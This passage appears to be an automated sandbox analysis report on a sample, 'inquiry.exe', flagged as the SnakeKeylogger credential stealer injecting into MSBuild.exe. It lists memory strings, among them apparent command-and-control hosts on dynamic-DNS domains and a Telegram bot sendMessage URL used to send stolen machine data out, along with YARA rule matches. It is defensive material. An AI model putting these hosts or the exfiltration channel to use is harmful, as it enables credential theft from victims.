                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.fastestpay.digital
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC046712_2_00007FFAACC04671
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC0BF512_2_00007FFAACC0BF51
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC091B02_2_00007FFAACC091B0
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC14B242_2_00007FFAACC14B24
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC044A02_2_00007FFAACC044A0
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACC033D02_2_00007FFAACC033D0
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACCD00012_2_00007FFAACCD0001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103C1A710_2_0103C1A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103D28410_2_0103D284
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103C47710_2_0103C477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103C73E10_2_0103C73E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010369A010_2_010369A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01033AA110_2_01033AA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01039DE010_2_01039DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103EC1810_2_0103EC18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103CCE710_2_0103CCE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103CFB710_2_0103CFB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01036FC810_2_01036FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01033E0910_2_01033E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103538110_2_01035381
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103F7F110_2_0103F7F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010339EE10_2_010339EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010329EC10_2_010329EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103CA1910_2_0103CA19
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103EC1710_2_0103EC17
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103FC4810_2_0103FC48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C97B010_2_054C97B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C9ED810_2_054C9ED8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C529010_2_054C5290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CED6010_2_054CED60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C297010_2_054C2970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CED7010_2_054CED70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE91810_2_054CE918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE91710_2_054CE917
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CF1C810_2_054CF1C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C8DF910_2_054C8DF9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C959010_2_054C9590
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CF1B910_2_054CF1B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C004010_2_054C0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE06810_2_054CE068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE06710_2_054CE067
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CDC0110_2_054CDC01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CDC1010_2_054CDC10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C003F10_2_054C003F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE4C010_2_054CE4C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CE4B210_2_054CE4B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CD36010_2_054CD360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CCF0810_2_054CCF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C0B2010_2_054C0B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C0B3010_2_054C0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C1B9710_2_054C1B97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C1BA810_2_054C1BA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CD7A810_2_054CD7A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CD7B810_2_054CD7B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C9E6910_2_054C9E69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CFA6A10_2_054CFA6A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CFA7810_2_054CFA78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C227810_2_054C2278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C8E0810_2_054C8E08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C520110_2_054C5201
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CF61010_2_054CF610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CF62010_2_054CF620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054CCEF710_2_054CCEF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C228810_2_054C2288
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312
                    Source: inquiry.exeStatic PE information: No import functions for PE file found
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs inquiry.exe
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOcumukahaqufef4 vs inquiry.exe
                    Source: inquiry.exe, 00000002.00000000.1270151909.000001F8698D0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTransponer.exe6 vs inquiry.exe
                    Source: inquiry.exeBinary or memory string: OriginalFilenameTransponer.exe6 vs inquiry.exe
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
